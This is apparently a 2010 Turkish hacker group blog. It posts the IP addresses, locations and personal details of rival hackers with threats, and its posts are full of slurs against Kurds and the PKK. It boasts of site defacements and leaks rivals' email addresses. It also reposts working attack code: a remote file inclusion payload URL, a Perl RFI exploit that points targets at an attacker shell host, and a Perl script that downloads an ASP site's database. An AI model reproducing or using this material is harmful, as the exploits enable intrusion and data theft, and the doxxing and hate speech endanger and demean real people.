FunnerBoy Kahpesinin Son IP VeriLeri :)

Posted in Genel with tags , , on Ekim 10, 2010 by C4patr0n

IP address [?]: 78.189.22.5
IP country code: TR
IP address country: ip address flag Turkey
IP address state: Kocaeli
IP address city: Izmit
IP address latitude: 40.7669
IP address longitude: 29.9169
ISP of this IP [?]: Turk Telekom
Organization: Turk Telekom
Host of this IP: [?]: 5.22.189.78.static.turktelekom.com.tr [Whois] [Trace]
Local time in Turkey: 2010-10-10 03:13

 

 

FunnerBoy Lamerinin Son İp VeriLeri 🙂

byDaNG3R ip VeriLeri :)

Posted in Genel on Eylül 28, 2010 by C4patr0n

orosbu coququ

orosbu cocuqu

byDaNG3R  adli  Orosbu Evladinin IP VeriLeri Dahada Eklenecek !

Bagli Olduqu Grup :  ColdHackers ( Orosbu CocuqLari , ANALARınLa Bile Sex Yapan Kahpe Evlatlari Grubu )  ! 🙂

byDaNG3R  Seninde Anani 7 Ceddini SikiCem !

KURDISTAN MIS ?  >  SIZ BOKISTAN BİLE KURAMAZSİNİZ !

BİJİ SEROK APO MUS ?  >  BİJİ SİKİK APO !   ANASI OROSPU 7 SULALESİ KAHPE KARILAR İLE KAYNAYAN PKK DENİLEN TERÖR ÖRGÜTÜNÜN YALAKA LİDERİ ! 🙂

ELİNDE SONUNDA YOLA GELECEKSİNİZ ADİLER !

———————————————————————–

BU ÜLKENİN TEK LİDERİ VAR !  BİAT EDİN KÖPEKLER !

TURKUN GRURU

ATAM

FuNNeRBoY

Posted in Genel on Eylül 27, 2010 by C4patr0n

FuNNeRBoY

BaqLi oLduqu Grup : ColdHackers ( orospu cocuklarının takımı )

a

a

Dogum Yeri : BATMAN

Birde İp Sini  qiZLemiş Orosbu Evladi :

Hostname Country Code Country Name Region Region Name City Postal Code Latitude Longitude ISP Organization Metro Code Area Code
78.189.206.89 TR Turkey 41 Kocaeli Izmit 40.7669 29.9169 Turk Telekom Turk Telekom

ne kadan malak butun bilgilerin var acı cektire cektire koYcam buraya orosbu cocuqu 😀

daha bilqiLerini Koyammı Lan Orosbu Cocuqu ? Yetermi Bu Kadar ?

Gaestebuch 1.2 Remote File Inclusion Vulnerability

Posted in Genel on Ağustos 27, 2010 by C4patr0n

[~] Affected-Software: HINNENDAHL.COM Kontakt Formular 1.1

[~] Vendor: http://www.hinnendahl.com/
[~] Download: http://www.hinnendahl.com/index.php?seite=download
[*] Greetz: inj3ct0r, DNX, Chip D3 Bi0s
Description: The $script_pfad parameter in /guestbook/gbook.php
isn't declared before require. So an attacker can execute some
php-shellcode about it. (line 3 - 4)

[+]Exploit: http://www.example.com/guestbook/gbook.php?script_pfad=[SHELLCODE]

mini CMS / News Script Light 1.0 Remote File Include Exploit

Posted in Genel on Ağustos 27, 2010 by C4patr0n

#!/usr/bin/perl
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# mini CMS / News Script Light 1.0 Remote File Include Exploit
#
# Bug found and exploit written by bd0rk || SOH-Crew
#
# Vendor: http://www.hinnendahl.com/
#
# Downloadsite: http://www.hinnendahl.com/index.php?seite=download
#
# Description: The script_pfad parameter in news_base.php isn't declared before require
#
# Contact: bd0rk[at]hackermail.com
# Website: www.soh-crew.it.tt
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
use Getopt::Long;
use URI::Escape;
use IO::Socket;
$shellcode = "http://yourshellsite.com";
main();
sub usage
{
print "\mini CMS / News Script Lite 1.0 Remote File Include Exploit\n";
print "Bug found and Exploit written by bd0rk\n";
print "-1, --target\ttarget\t(yourhost.com)\n";
print "-2, --shellpath\tshell\t(http://yourshellsite.com)\n";
print "-3, --dir\tDirectory\t(/news_system)\n";
exit;
}
sub main
{
GetOptions ('1|target=s' => \$target, '2|shellpath=s' => \$shellpath,'3|dir=s' => \$dir);
usage() unless $target;
$shellcode = $shellpath unless !$shellpath;
$targethost = uri_escape($shellcode);
$socket = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$target",PeerPort=>"80") or die "\nConnection() Failed.\n";
print "\nConnected to ".$target.", Attacking host...\n";
$bd0rk = "inst=true&ins_file=".$target."";
$soh = lenght($bd0rk);
print $socket "POST ".$dir."/news_system/news_base.php?script_pfad= HTTP/1.1\n";
print $socket "Target: ".$target."\n";
print $socket "Connection: close\n";
print $socket "Content-Type: application/x-www-form-urlencoded\n";
print $socket "Content-Lenght: ".$soh."\n\n";
print $socket $soh;
print "Server-Response:\n\n";
{
print " ".$recvd."";
}
exit;

}

stranenkurdistan.com – rojbirges.tk – azadiyawelatemin.com Pkk Destekçileri Hacked !

Posted in Genel on Ağustos 24, 2010 by C4patr0n

stranenkurdistan.com

http://legend-h.org/deface_mirror/?id=136303

www.rojbirges.tk

http://legend-h.org/deface_mirror/?id=136589

azadiyawelatemin.com

http://legend-h.org/deface_mirror/?id=138081

pkk’ya destek veren siteler birer birer hackliyoruz !

ColdHackers’a Burdan Mesaj Yolluorum ;

Sizin Soyunuzu Kurutmaya Yemin Etti Bu Ülkücü Gençlik !

FunnerBoy Haini Demiştin Siz Daha ADANA’yı Zor Geçiyorsunuz ? Peki Nasıl agır Kayıplar Verdiniz ? Piçlerinizin Analarini SikiyoruZ !

Türktün Şehidi ŞereftiR.

Pkk’lının Ölüsü LEŞTİR … !

FunnerBoy IP adresin hikametkah Yerin Kayıt Altında . !

www.zippo.co.ua Zippo Avustralya hacked

Posted in Genel on Ağustos 24, 2010 by C4patr0n

http://www.zippo.co.ua

http://www.zone-h.org/mirror/id/11285637

sanirsam avustralya zippo resmi web sitesi veya satiş sitesi olabilir  gelipte artizlenmeyin öperim gözlerinizden ona göre haa 🙂

www.mojrim.net hacked

Posted in Genel on Ağustos 24, 2010 by C4patr0n

http://www.mojrim.net

http://zone-h.org/mirror/id/11299109

bir adet daha arab heykir timini bertaraf etmiş bulunuyoruz 🙂

10algeria.net & forum.10algeria.net hacked ;)

Posted in Genel on Ağustos 23, 2010 by C4patr0n

C4patr0n & TntonE (  Korparatiyon ) TürkçesiyLe : )

http://www.forum.10algeria.net

http://owned-m.com/index.php?file=Mirror&Site=forum.10algeria.net

http://www.10algeria.net

http://owned-m.com/index.php?file=Mirror&Site=10algeria.net

Nik Namesini BiLmediqim 2’de bir site hackleyen pakistanli heykır bozuntusu hacked 🙂

msnsi :  ok5@hotmail.fr   bunada çaktikta acıdık geri verdik : )

msnsi 2 : pwn@dzhacker.net  bu bizde kalsin tntone sayiplendi götoŞ 🙂

Video Script ASP Database Disclosure Exploit

Posted in Genel on Ağustos 22, 2010 by C4patr0n

Download : http://www.scriptmafia.org/


use LWP::Simple;
use LWP::UserAgent;

system('cls');
system('Video Script ASP Database Disclosure Exploit');
system('color a');

if(@ARGV < 2)
{
print "[-]How To Use\n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}

print "\n************************************************************************\n";
print "\n1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\n";
print " _ __ __ __ 1\n";
print "\1 /' \ __ /'__`\ /\ \__ /'__`\ 0\n";
print " /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1\n";
print "\1 \/_/\ \ /' _ `\ \/\ \/_/_\_> Exploit database separated by exploit 0\n";
print " \/___/ type (local, remote, DoS, etc.) 1\n";
print "\1 1\n";
print " [+] Site : Inj3ct0r.com 0\n";
print "\1 [+] Support e-mail : submit[at]inj3ct0r.com 1\n";
print " 0\n";
print "\1 ####################################### 1\n";
print " I'm indoushka member from Inj3ct0r Team 1\n";
print "\1 ####################################### 0\n";
print "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\n";
($TargetIP, $path, $File,) = @ARGV;

$File="destination/dinimbenim.mdb";
my $url = "http://" . $TargetIP . $path . $File;
print "\n wait!!! \n\n";

my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "D:/dinimbenim.mdb");

if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to D:/dinimbenim.mdb\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}